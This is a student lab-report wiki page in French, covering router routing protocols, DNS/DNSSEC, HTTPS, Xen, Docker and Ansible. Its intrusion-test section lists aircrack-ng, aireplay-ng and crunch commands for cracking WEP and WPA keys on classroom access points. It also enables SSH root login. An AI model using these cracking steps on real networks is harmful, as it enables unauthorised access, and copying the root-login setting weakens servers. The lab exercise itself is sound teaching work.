&lt;br /&gt;
=====Liaison R1 vers COM-1 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/1&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/1 , et pour '''&amp;lt;NUMERO&amp;gt;''' ={ 101, 102, 103, 104, 105, 106, 200 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Liaison R1 vers COM-2 =====&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0/2&lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
&lt;br /&gt;
sans quitter l'interface GigabitEthernet0/0/2, et pour '''&amp;lt;NUMERO&amp;gt;''' = { 101, 102, 103, 104, 105, 106, 200 } , nous créons des instances de service en utilisant la suite de commandes:&lt;br /&gt;
&lt;br /&gt;
  service instance '''&amp;lt;NUMERO&amp;gt;''' ethernet&lt;br /&gt;
   encapsulation dot1q '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
   rewrite ingress tag pop 1 symmetric&lt;br /&gt;
   bridge-domain '''&amp;lt;NUMERO&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
=====Configuration Générale=====&lt;br /&gt;
Un routeur proposent différents protocoles de routage &lt;br /&gt;
 '''routerE304(config)'''#router ?                                                                                                                                     &lt;br /&gt;
   bgp       Border Gateway Protocol (BGP)                                                                                                                       &lt;br /&gt;
   eigrp     Enhanced Interior Gateway Routing Protocol (EIGRP)                                                                                                  &lt;br /&gt;
   isis      ISO IS-IS                                                                                                                                           &lt;br /&gt;
   iso-igrp  IGRP for OSI networks                                                                                                                               &lt;br /&gt;
   mobile    Mobile routes                                                                                                                                    &lt;br /&gt;
   odr       On Demand stub Routes                                                                                                                               &lt;br /&gt;
   ospf      Open Shortest Path First (OSPF)                                                                                                                     &lt;br /&gt;
   ospfv3    OSPFv3                                                                                                                                              &lt;br /&gt;
   rip       Routing Information Protocol (RIP)&lt;br /&gt;
&lt;br /&gt;
Nous allons en utiliser quelques uns dans notre implémentation&lt;br /&gt;
======OSPF pour IPv4======&lt;br /&gt;
Open Shortest Path First (OSPF) est un protocol qui permet à des routeurs adjacents dans un même domaine d'administration de s'échanger des informations sur le réseau et sa topologie. Cet échange d'information introduit une notion de voisinage entre routeurs. Les informations échangées (LSBD), permettent aux différents routeurs d'ajuster leurs tables de routage et de choisir les meilleures routes sur la base du coût de transmission. [https://en.wikipedia.org/wiki/Open_Shortest_Path_First Plus]&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.100.1                                 # un id pour le routeur. c'est comme ça qu'il s'identifie auprès de ses voisins                                                                                   &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # on définie les adresses que l'on souhaite diffuser aux voisins                                                                                                             &lt;br /&gt;
  summary-address 10.60.0.0 255.255.0.0 not-advertise   # Celles que l'on veut pas diffuser (c'est notre précieux...)                                                                                                         &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés                                                                                                                               &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # délimite le domaine OSPF sur lequel on diffuse pour ne pas surcharger la bases de données de routeurs&lt;br /&gt;
&lt;br /&gt;
======RIP pour IPv6====== &lt;br /&gt;
''Routing Information Protocol'' pour l'échange d'information de routage. Ceci permet de router les paquets entre les routeurs de notre infrastructure avec le minimum de sauts (chemin le plus court).&lt;br /&gt;
&lt;br /&gt;
 conf t&lt;br /&gt;
  ipv6 router rip tpima5sc             # un identifiant pour le process RIP que nous voulons configurer                                                                                                                               &lt;br /&gt;
   redistribute connected metric 1     # on autorise la diffusion des routes connectées au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute static metric 1        # on autorise la diffusion des routes définies en statique au maximum nombre de sauts                                                                                                                         &lt;br /&gt;
   redistribute rip 1 metric 1         # on autorise la diffusion des routes sous le protocole rip 1&lt;br /&gt;
&lt;br /&gt;
Vous pouvez faire un diagnostique des routes connues et leur sources une fois que l'interconnexion avec le réseau de l'école est configurée.&lt;br /&gt;
 '''routerE304#'''sh ip route ospf 1          &lt;br /&gt;
 Codes: L - local, C - connected, S - static, '''R - RIP''', M - mobile, B - BGP&lt;br /&gt;
        D - EIGRP, EX - EIGRP external, '''O - OSPF''', IA - OSPF inter area &lt;br /&gt;
        N1 - OSPF NSSA external type 1, N2 - OSPF NSSA external type 2&lt;br /&gt;
        E1 - OSPF external type 1, E2 - OSPF external type 2&lt;br /&gt;
        i - IS-IS, su - IS-IS summary, L1 - IS-IS level-1, L2 - IS-IS level-2&lt;br /&gt;
        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route, H - NHRP, l - LISP&lt;br /&gt;
        a - application route&lt;br /&gt;
        + - replicated route, % - next hop override, p - overrides from PfR&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
 O*E2  0.0.0.0/0 [110/1] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
       10.0.0.0/8 is variably subnetted, 85 subnets, 8 masks&lt;br /&gt;
 O E2     10.0.8.0/24 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.11.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.17.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.18.0.0/22 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.0.0/17 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.252.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.254.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.22.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.24.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
  --More--&lt;br /&gt;
======Configuration du spanning tree======&lt;br /&gt;
Pour eviter que l'apparition de boucles dans notre infrastructure nous devons activer le protocole spanning-tree.&lt;br /&gt;
En effet, dans les réseaux commutés Ethernet la présence de boucle génère des tempêtes de diffusion qui paralysent le réseau : tous les liens sont saturés de trames de diffusion qui tournent en rond dans les boucles et les tables d'apprentissage des commutateurs (switch) deviennent instables. [https://fr.wikipedia.org/wiki/Spanning_Tree_Protocol plus] &lt;br /&gt;
&lt;br /&gt;
 spanning-tree mode pvst                # utilisation du protocole de planning tree en mode par Vlan (per vlan spanning tree)                                                                                                                         &lt;br /&gt;
 spanning-tree extend system-id         # utilisation du standard system-id pour l'assignation des identifiants uniques&lt;br /&gt;
&lt;br /&gt;
======unicast IPv6======&lt;br /&gt;
On active unicast IPv6 permettant de router les addresses IPv6 unicast Global (2001:...) que nous avons choisis.&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation du réseau ===&lt;br /&gt;
&lt;br /&gt;
==Services Internet == &lt;br /&gt;
&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la VM une première fois,  il faut utiliser la commande :&lt;br /&gt;
 xl console mycoplasma  --depuis cordouan.&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser les services réseaux il faut être capable de se connecter à la VM en SSH, il faut faire quelques modifications dans le fichier etc/ssh/sshd_config de la VM. Voici la modification : &lt;br /&gt;
  #PermitRootLogin prohibit-password&lt;br /&gt;
par&lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Par la suite, il sera possible d'accéder à la VM directement : &lt;br /&gt;
 ssh root@193.48.57.178&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS ===&lt;br /&gt;
&lt;br /&gt;
Nous avons utiliser le registrar Gandi (http://www.gandi.net) pour réserver notre nom de domaine, nous avons choisi mycoplasma2.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, faire apparaitre dans le fichier /etc/bind/named.conf.options la ligne suivante: &lt;br /&gt;
 dnssec-validation auto;&lt;br /&gt;
&lt;br /&gt;
====Configuration apache ====&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/apache2/sites-available/loadbalance.conf &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:443&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site	&lt;br /&gt;
 	DocumentRoot /var/www/html/&lt;br /&gt;
 	ServerAdmin lina.mejbar@polytech-lille.net&lt;br /&gt;
 	SSLEngine on&lt;br /&gt;
 	SSLCertificateFile /etc/ssl/certs/mycoplasma2.site.crt&lt;br /&gt;
  	SSLCertificateKeyFile /etc/ssl/private/myserver.key &lt;br /&gt;
 	SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 	SSLVerifyClient None&lt;br /&gt;
 	ErrorLog ${APACHE_LOG_DIR}/lb-error.log&lt;br /&gt;
 	CustomLog ${APACHE_LOG_DIR}/lb-access.log combined&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:80&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site&lt;br /&gt;
 	ProxyPass &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
  	ProxyPassReverse &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
 	Redirect &amp;quot;/&amp;quot; &amp;quot;https://www.mycoplasma2.site&amp;quot;&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin pour enregistrer nos modifications :&lt;br /&gt;
  a2enmod ssl&lt;br /&gt;
  a2ensite mycoplasma2.site.conf&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir sur la photo ci-dessous : nous avons accès à notre site de façon sécurisée.&lt;br /&gt;
[[Fichier:groupe2_https.png|center|500px|Nous avons accès au site sécurisé]]&lt;br /&gt;
&lt;br /&gt;
====Configuration bind9====&lt;br /&gt;
&lt;br /&gt;
BIND veut dire : Berkeley Internet Name Daemon&lt;br /&gt;
Nous avons déjà installer le package [http://www.example.com/ titre du lien ici].&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut créer un fichier de configuration dans le dossier /etc/bind/ avec les informations de notre site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800 &lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
  			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @       IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Il faut modifier le fichier named.conf.local pour lui donner le nom de notre fichier configuration et de définir les paramètres généraux d'une zone.:&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/mycoplasma2.site&amp;quot;; &lt;br /&gt;
         allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite relancer avec la commande suivante :&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Il faut aussi ajouter dans l'onglet GlueRecords le nom de domaine de notre site, et celui de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
On doit configurer apache2 en mode sécurisé à l’aide d’une clef asymétrique et d’un certificat signé par une autorité de certification. Le CA signe un CSR (Certificate Signing Request), pour ce faire il faut créer les clefs et le CSR en utilisant openssl. &lt;br /&gt;
Il faut ensuite le transformer en un certificat, on va donc configurer apache2 sur le port 443 afin qu'il puisse gérer du HTTPS. &lt;br /&gt;
&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite renseigner quelques informations : &lt;br /&gt;
&lt;br /&gt;
   Country Name (2 letter code) [AU]: '''France'''&lt;br /&gt;
   State or Province Name (full name) [Some-State]: '''Haut de France'''&lt;br /&gt;
   Locality Name (eg, city) []: '''Lille'''&lt;br /&gt;
   Organization Name (eg, company) [Internet Widgits Pty Ltd]: '''Polytech Lille'''&lt;br /&gt;
   Organizational Unit Name (eg, section) []: IMA5&lt;br /&gt;
   Common Name (e.g. server FQDN or YOUR name) []: '''mycoplasma2.site'''&lt;br /&gt;
   Email Address []:&lt;br /&gt;
   Please enter the following 'extra' attributes to be sent with your certificate request&lt;br /&gt;
   A challenge password []:&lt;br /&gt;
   An optional company name []:&lt;br /&gt;
&lt;br /&gt;
La seule vraie ligne où il ne faut pas se tromper, c'est celle où l'on indique le nom du site (Common Name), si la ligne est fausse Gandi n'acceptera pas votre clef.&lt;br /&gt;
Une fois ces informations renseignées, une clef est générée. &lt;br /&gt;
&lt;br /&gt;
/!\ Il faut la garder précieusement et ne pas la SUPPRIMER des fichiers de la machine virtuelle, dans ce cas il faudra tout recommencer avec un nouveau nom de domaine parce que la clef n'est générable qu'une seule fois.&lt;br /&gt;
Il faut maintenant copier le contenu de ce fichier avec le &amp;quot;BEGIN CERTIFICATE REQUEST-----&amp;quot; et le &amp;quot;END CERTIFICATE REQUEST-----&amp;quot; sur le site de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
 root@mycoplasma:/etc/bind# vim named.conf&lt;br /&gt;
&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.options&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.local&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.default-zones&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Pour générer les clefs dans un même dossier, il faut le créer voici le chemin pour notre groupe :&lt;br /&gt;
 root@mycoplasma:/etc/bind/mycoplasma2.site.dnssec# &lt;br /&gt;
&lt;br /&gt;
Pour générer les clés KSK on lance la commande suivante :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE mycoplasma2.site&lt;br /&gt;
Pour ZSK :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1048 -n ZONE mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
On peut maintenant rajouter nos clefs dans le fichier mycoplasma2.site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-ksk.key'''&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-zsk.key'''&lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
 			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @      IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone en exécutant la commande suivante :&lt;br /&gt;
 dnssec-signzone -o mycoplasma2.site -k mycoplasma2.site-ksk ../mycoplasma2.site mycoplasma2.site-zsk&lt;br /&gt;
&lt;br /&gt;
Dernière étape, il fait ajouter le chemin du fichier pour utiliser le fichier de zone signé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        '''file &amp;quot;/etc/bind/mycoplasma2.site.signed&amp;quot;;''' &lt;br /&gt;
        allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous vérifions sous dnsviz.net le bon fonctionnement du DNSSEC :&lt;br /&gt;
[[Fichier:groupe2_dnsViz.png|center|500px]]&lt;br /&gt;
&lt;br /&gt;
===Serveur Freeradius===&lt;br /&gt;
&lt;br /&gt;
==Ferme de serveurs Web==&lt;br /&gt;
Il faut implanter une architecture d’équilibrage de charge pour un site Web.&lt;br /&gt;
&lt;br /&gt;
===Architecture générale de la ferme===&lt;br /&gt;
Pour ce faire, chaque binôme a créé une nouvelle machine virtuelle Xen qui hébergera un serveur Web. Ainsi chaque binôme pourra disposer de plusieurs serveurs Web proposant exactement le même site sur plusieurs machines différentes. Ces serveurs Web ne seront pas directement disponibles d’Internet mais au travers d’un équilibreur de charge tournant sur leur machine virtuelle principale.&lt;br /&gt;
&lt;br /&gt;
'''Nom de la Machine Virtuelle ''' : private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
'''Commandes''': &lt;br /&gt;
La MV doit être créée sur Cordouan.&lt;br /&gt;
 root@zabethX:~# ssh root@cordouan.insecserv.deule.net &lt;br /&gt;
&lt;br /&gt;
 root@cordouan:~# xen-create-image --hostname=private-mycoplasma --ip=ip 192.168.0.2 --dir=/usr/local/xen&lt;br /&gt;
 root@cordouan:~# xl create private-mlycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
Il faut suivre les logs de la création de la machine virtuelle avec le fichier suivant:&lt;br /&gt;
 root@cordouan:~# tail -f /var/log/xen-tools/private-mycoplasma.log&lt;br /&gt;
&lt;br /&gt;
Pour accèder une première fois à la machine virtuelle, il faut utiliser cette commande car SSH n'est pas encore autorisé.&lt;br /&gt;
 root@cordouan:~# xl console private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
Pour l'activer voici les modifications, il faut remplacer la ligne suivante de ce fichier /etc/ssh/sshd_config :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot;  '''par'''  &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
&lt;br /&gt;
Il est possible de se connecter en SSH  et de paramétrer le proxy : &lt;br /&gt;
 root@cordouan:~# ssh root@192.168.0.2&lt;br /&gt;
 root@private-mycoplasma:~# export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# export https_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# xen-create-image --hostname=herpesgenital --dhcp --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
Il faut modifier l'adresse mac, pour avoir une adresse mac unique pour chaque binôme, et il faut configurer le bridge.&lt;br /&gt;
 vif = [ 'mac=00:16:3E:2B:FF:6A,bridge=IMA5sc-priv' ]&lt;br /&gt;
&lt;br /&gt;
Voici notre nouvelle structure :&lt;br /&gt;
[[Fichier:G2_Structure.png|center|800px]]&lt;br /&gt;
&lt;br /&gt;
Pour y arriver, il faut modifier les fichiers /etc/network/interfaces des deux machines virtuelles avec les adresses, Gateway, et netmask marque sur la photo ci-dessus. Et valider les modifications avec les commandes habituelles : ifdown eth'''i''' et ifup eth'''i'''&lt;br /&gt;
&lt;br /&gt;
=== Mascarade ===&lt;br /&gt;
&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.0.0/24&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.0.0/24&lt;br /&gt;
 iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.0.0/24&lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
 apt install iptables-persistent&lt;br /&gt;
 &lt;br /&gt;
Il faut ensuite décommenter &lt;br /&gt;
 net.ipv4.ipforward=1&lt;br /&gt;
&lt;br /&gt;
=== Création du conteneur ===&lt;br /&gt;
&lt;br /&gt;
Il est important dans cette partie que tous les binômes se mettent d'accord pour installer le même package de docker &lt;br /&gt;
 root@mycoplasma:~/#  ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Voici le fichier DockerFile que l'on a codé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~/test# cat docker/Dockerfile &lt;br /&gt;
&lt;br /&gt;
 FROM centos:latest&lt;br /&gt;
 MAINTAINER NewstarCorporation&lt;br /&gt;
 RUN yum -y install httpd&lt;br /&gt;
 COPY mycoplasma/index.html /var/wwww/html/index.html&lt;br /&gt;
 CMD [&amp;quot;/usr/sbin/httpd&amp;quot;, &amp;quot;-D&amp;quot;, &amp;quot;FOREGROUND&amp;quot;]&lt;br /&gt;
 EXPOSE 80&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On a eu le problème suivant lorsqu'on souhaite visiter notre site : &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_mycoplasmaSite.png|center|900px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker ps =&amp;gt; Notre docker &amp;quot;mycoplasma&amp;quot;  tourne donc  ce n'est pas le problème.&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker exec -it &amp;lt;CONTAINER ID&amp;gt; /bash/bin &lt;br /&gt;
 root@&amp;lt;CONTAINER ID&amp;gt;:~/# ls /var/www/html &lt;br /&gt;
&lt;br /&gt;
Avec cette dernière commande, on peut voir que le fichier index.html ne s'est pas copié malgré les commandes du Dockerfile. Pourtant le Docker build s'est exécuté sans afficher d'erreurs. On peut voir les logs pour avoir une idée : &lt;br /&gt;
  root@corduan:~/# docker logs &amp;lt;CONTAINER ID&amp;gt;&lt;br /&gt;
Voici le résultat : &lt;br /&gt;
 AH00558: httpd: Could not reliably determine the server's fully qualified domain name, using 172.17.0.5. Set the 'ServerName' directive globally to suppress this message&lt;br /&gt;
&lt;br /&gt;
=== Configuration des serveurs internes ===&lt;br /&gt;
&lt;br /&gt;
===Equilibreur de charge===&lt;br /&gt;
&lt;br /&gt;
==Tests d’intrusion==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
Pour scanner l'environnement Wi-Fi, on utilise l'outil airodump-ng. On remarque qu'il y a deux types de wifi, les cracottes avec un c et les kracottes avec un k.&lt;br /&gt;
On lance l'interface en mode moniteur : &lt;br /&gt;
 airmon-ng start  wlan0mon&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
&lt;br /&gt;
On a choisi de casser la clé WEP de la cracotte5 sur le channel 2, on enregistre les paquets dans webPack.&lt;br /&gt;
 airodump-ng -c 2 –-bssid 04:DA:D2:9C:5O:5A -w wepPack wlan0mon&lt;br /&gt;
&lt;br /&gt;
La commande suivante permet de se faire passer pour un client afin de générer de l'activité sur le réseau.&lt;br /&gt;
 aireplay-ng --fakeauth 30 -a 04:DA:D2:9C:5O:5A wlan0mon&lt;br /&gt;
&lt;br /&gt;
On utilise les paquets enregistrés pour réaliser le cassage:&lt;br /&gt;
 aircrack-ng wepDico*.cap&lt;br /&gt;
&lt;br /&gt;
[[Fichier:g2_wep.png|center|600 px]]&lt;br /&gt;
&lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
Il faut lancer la commande ip a : récupérer le nom de l'interface wifi : &amp;quot;&amp;quot;wlx40a5ef0f6518&amp;quot;&amp;quot;. Il faut le lancer avec la commande :&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite écouter le réseau, on récupère alors le channel(2), le nom du wifi, le BSSID (04:DA:D2:9C:5O:5A) avec la commande suivante:&lt;br /&gt;
 airodump-ng --encrypt wpa wlan0mon&lt;br /&gt;
Nous avons choisi de cracker &amp;quot;kracote03&amp;quot;&lt;br /&gt;
&lt;br /&gt;
 airodump-ng wlan0mon --bssid 04:DA:D2:9C:5O:5A --ch 2 -w capture&lt;br /&gt;
&lt;br /&gt;
Il faut l'arreter une fois qu'on obtient un handshake &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_WPA.png| 800 px|center]]&lt;br /&gt;
&lt;br /&gt;
Pour générer un dictionnaire, on a besoin de la commande suivante : &lt;br /&gt;
 sudo apt-get update&lt;br /&gt;
 sudo apt-get install crunch&lt;br /&gt;
&lt;br /&gt;
 crunch 8 8 -o dico.txt 0123456789&lt;br /&gt;
&lt;br /&gt;
* 8 8 : donne des codes de 8 caractères au minimum et au maximum&lt;br /&gt;
&lt;br /&gt;
On lance cette commande : &lt;br /&gt;
 airodump-ng -c 2 --bssid 04:DA:D2:9C:5O:5A -w ./home/pifou/crack wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Voici une capture de la commande :&lt;br /&gt;
 aircrack crack/capture.cap -w dico.txt &lt;br /&gt;
[[Fichier:G2_catch.png|center]]&lt;br /&gt;
&lt;br /&gt;
On remarque ce la photo ci dessus que la commande a pris 21 min et 42 sec.&lt;br /&gt;
&lt;br /&gt;
== Partie  ASR ==&lt;br /&gt;
&lt;br /&gt;
=== Ansible ===&lt;br /&gt;
&lt;br /&gt;
Ansible permet l'automatisation par connexion sans mot de passe.&lt;br /&gt;
Il faut d'abord générer une clef asymétrique :&lt;br /&gt;
 ssh-keygen -t rsa&lt;br /&gt;
&lt;br /&gt;
Installation de la clef publique sur les machines virtuelles 192.168.0.1 à 192.168.0.6  :&lt;br /&gt;
 cat .ssh/id_rsa.pub | ssh 192.168.0.1 &amp;quot;cat &amp;gt;&amp;gt; /root/.ssh/authorized_keys2&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Il faut  installer Ansible : &lt;br /&gt;
 apt install ansible&lt;br /&gt;
====Hosts====&lt;br /&gt;
Ensuite il faut rédiger l'inventaire ( /etc/ansible/hosts ) c'est un fichier yaml, il faut très attention à la syntaxe. Ce fichier regroupe le parc informatique :&lt;br /&gt;
&lt;br /&gt;
 all:&lt;br /&gt;
 hosts:&lt;br /&gt;
  interne:&lt;br /&gt;
    ansible_host: 192.168.0.2&lt;br /&gt;
 children:&lt;br /&gt;
  serveur-web:&lt;br /&gt;
   hosts:&lt;br /&gt;
    192.168.0.[1:6]&lt;br /&gt;
&lt;br /&gt;
====Playbooks====&lt;br /&gt;
&lt;br /&gt;
Maintenant qu'on a défini toutes les machines dans notre parc et qu'on peut se connecter automatique, on peut exécuter une commande à distance sur tout le parc à l'aide d'Ansible.&lt;br /&gt;
Un &amp;quot;playbook&amp;quot; c'est une liste des tâches à effectuer sur ces machines.&lt;/div&gt;</summary>
		<author><name>Aaitmouh</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52002</id>
		<title>TP sysres IMA5sc 2019/2020 G2</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2019/2020_G2&amp;diff=52002"/>
				<updated>2020-01-05T13:01:09Z</updated>
		
		<summary type="html">&lt;p&gt;Aaitmouh : /* OSPF pour IPv4 */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot;/&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=Présentation générale=&lt;br /&gt;
&lt;br /&gt;
Travaux pratiques protocoles avancés. Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6.&lt;br /&gt;
&lt;br /&gt;
Le cours se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Reseau.IMA5sc/ adresse]&lt;br /&gt;
Le sujet du TP se trouve à cette [https://rex.plil.fr/Enseignement/Reseau/Protocoles.IMA5sc/reseau.html adresse]&lt;br /&gt;
&lt;br /&gt;
=Réalisation du TP=&lt;br /&gt;
